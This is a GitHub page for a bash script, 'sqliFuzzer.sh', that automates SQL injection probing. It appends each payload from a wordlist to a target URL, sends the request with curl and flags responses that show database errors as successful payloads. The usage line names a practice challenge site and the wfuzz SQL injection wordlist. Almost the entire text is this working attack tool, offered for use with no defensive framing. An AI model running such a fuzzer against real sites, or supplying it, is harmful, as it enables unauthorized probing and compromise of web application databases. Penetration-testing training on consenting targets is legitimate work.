-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathsqliFuzzer.sh
54 lines (51 loc) · 1.86 KB
/
sqliFuzzer.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/bin/bash
clear
echo " _ _ _ ______ "
echo " /\ | | | | | | |____ | "
echo " / \ | |__ __| | _ _ | | _ __ / /_ __ ___ __ _ _ __ "
echo " / /\ \ | '_ \ / _ || | | || || '__|/ /| '_ _ \ / _ || '_ \ "
echo " / ____ \ | |_) || (_| || |_| || || | / / | | | | | || (_| || | | |"
echo "/_/ \_\|_.__/ \__,_| \__,_||_||_| /_/ |_| |_| |_| \__,_||_| |_|"
echo " \|||/"
echo " (o o)"
echo " .-.____ +-oooO--(_)---------+ ________.-."
echo "----/ \_)_______) | Visit Us At | (_______(_/ \----"
echo " ( ()___) https://hackerenv.com (___() )"
echo " ()__) | | (__()"
echo "----\___()_) +------------Ooo----+ (_()___/----"
echo " |__|__|"
echo " || ||"
echo " ooO Ooo"
url="${1}"
list="${2}"
urlEncode() {
while read -n 1 i
do
if [[ "${i}" = "'" ]]
then
char="${payload}"
encode="%27"
payload="${char/\'/$encode}"
elif [[ "${i}" = '"' ]]
then
char="${payload}"
encode="%22"
payload="${char/\"/$encode}"
elif [[ "${i}" = ' ' ]]
then
char="${payload}"
encode="%20"
payload="${char/ /$encode}"
fi
done <<< "${payload}"
}
if [[ ! -z "${url}" && "${list}" ]]
then
for payload in $(cat "${list}")
do
urlEncode "${payload}"
curl -s "${url}""${payload}" | isError="$(grep -e 'error' -e 'mysql_fetch_array()')" && echo -e "\e[32mSuccessful Payload\e[0m: ${url}\e[31m${payload}\e[0m"
done
else
echo -e "Usage:\n./sqliFuzzer.sh URL payload.txt\n./sqlfuzzer.sh http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 /usr/share/wfuzz/wordlist/Injections/SQL.txt"
fi